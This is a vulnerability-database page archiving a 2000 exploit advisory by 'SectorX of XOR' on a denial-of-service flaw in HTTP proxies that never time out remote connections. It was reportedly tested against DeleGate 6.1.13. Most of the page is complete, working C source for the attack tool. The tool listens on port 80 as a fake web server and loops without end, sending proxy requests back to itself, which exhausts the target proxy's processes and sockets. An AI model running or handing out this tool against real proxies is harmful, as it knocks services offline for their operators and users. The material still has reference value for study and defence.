Vulners
Lucene search
proxy.dos
`HTTP Proxies Denial of Service
by SectorX of XOR (http://xorteam.cjb.net)
The theory
==========
While browsing through my own http proxy code, i noticed an interesting
coding mistake - the proxy did not perfrom timeout checking on the remote host
the user was connecting to. since every time a user requests a file the proxy
spawns him a process, i figured this could be used for a nice fork() attack,
or make the proxy run out of available sockets.
I tested it against delegate 6.1.13, it created some system lag and then
ran out of free sockets, and couldnt accept anymore connections.
I _assume_ this makes alot of http proxies vulnerable, since this seems
like a common mistake.
Exploit
=======
This code acts as a webserver and a proxy client. it binds port 80 and sets
listen() to keep ALOT of connections holding, then connects to the target
proxy and starts spawning connections to its fake httpd, thus creating alot of
stalled child processes.
this was coded in a rush so dont mind its uglyness =p
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <time.h>
#include <sys/time.h>
int Connect(int ip, int port)
{
int fd;
struct sockaddr_in tgt;
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd<0) return -1;
memset(&tgt,0,sizeof(struct sockaddr_in));
tgt.sin_port = htons(port);
tgt.sin_family = AF_INET;
tgt.sin_addr.s_addr = ip;
if (connect(fd,(struct sockaddr*)&tgt,sizeof(struct sockaddr))<0) return -1;
return fd;
}
int sprint(int fd, const char *str,...)
{
va_list args;
char buf[4096];
memset(&buf,0,sizeof(buf));
va_start(args,str);
vsnprintf(buf,sizeof(buf),str,args);
return(write(fd,buf,strlen(buf)));
}
int main(int argc, char *argv[])
{
int fd;
struct sockaddr_in box;
fprintf(stderr, "Many http proxies denial of service (c) sectorx of xor [public]\n");
if (argc < 3) {
fprintf(stderr, "usage: %s <your ip> <proxy ip> [proxy port]\n",argv[0]);
return;
}
fprintf(stderr,"Making a stall on port 80 ... ");
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd<0) {
perror("socket() ");
return;
}
memset(&box,0,sizeof(struct sockaddr_in));
box.sin_family = AF_INET;
box.sin_addr.s_addr = INADDR_ANY;
box.sin_port = htons(0x50);
if (bind(fd,(struct sockaddr*)&box,sizeof(struct sockaddr))<0) {
perror("bind()[80] ");
return;
}
if (listen(fd,65535)<0) {
perror("listen() ");
return;
}
fprintf(stderr,"done!\n");
fprintf(stderr,"Attacking proxy : ");
for (;;) {
int sock;
sock = Connect(inet_addr(argv[2]),(argc>3)?(atoi(argv[3])):3128);
if (sock<0) {
perror("Connect() ");
sleep(15);
continue;
}
sprint(sock,"GET http://%s/ HTTP/1.0\n\n",argv[1]);
fprintf(stderr, ".");
}
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Aug 2000 00:00Current
7.4High risk
Vulners AI Score7.4